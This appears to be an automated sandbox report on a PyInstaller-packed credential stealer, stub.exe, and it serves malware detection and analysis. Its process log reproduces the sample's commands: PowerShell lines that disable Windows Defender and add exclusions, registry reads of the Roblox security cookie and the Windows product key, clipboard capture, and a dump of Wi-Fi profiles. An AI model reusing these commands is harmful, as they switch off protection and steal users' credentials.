Malware Analysis Report

2025-03-15 04:33

Sample ID 241026-ajb58sxgqm
Target stub.exe
SHA256 a39a334b04b7c0559cf094b51716343c85d6b6b801be2b6776d75893f564db1a
Tags pyinstaller collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
Score 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

8/10

SHA256

a39a334b04b7c0559cf094b51716343c85d6b6b801be2b6776d75893f564db1a

Threat Level: Likely malicious

The file stub.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Command and Scripting Interpreter: PowerShell

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Loads dropped DLL

Clipboard Data

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Detects Pyinstaller

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Detects videocard installed

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-26 00:14

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-26 00:14

Reported

2024-10-26 00:16

Platform

win7-20240903-en

Max time kernel

122s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 2420 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 2420 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI24202\python310.dll

MD5 63a1fa9259a35eaeac04174cecb90048
SHA1 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a
SHA256 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed
SHA512 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-26 00:14

Reported

2024-10-26 00:16

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Browser Information Discovery

discovery

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 624 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 624 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Users\Admin\AppData\Local\Temp\stub.exe
PID 824 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 968 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 1940 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1940 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4084 wrote to memory of 4280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4084 wrote to memory of 4280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 824 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 824 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 824 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 3384 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3384 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3208 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3208 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4484 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4484 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4012 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4012 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4992 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4992 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2608 wrote to memory of 4604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 4604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5056 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 5056 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 824 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 456 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 456 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 824 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4208 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4208 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 824 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2172 wrote to memory of 3248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2172 wrote to memory of 3248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4604 wrote to memory of 4452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4604 wrote to memory of 4452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 824 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 824 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4892 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4892 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD32E.tmp" "c:\Users\Admin\AppData\Local\Temp\lojle10l\CSCC2FF8CFCF8194165BEA0632CE55CF0DC.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.35:443 gstatic.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI6242\python310.dll

MD5 63a1fa9259a35eaeac04174cecb90048
SHA1 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a
SHA256 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed
SHA512 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

C:\Users\Admin\AppData\Local\Temp\_MEI6242\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

C:\Users\Admin\AppData\Local\Temp\_MEI6242\base_library.zip

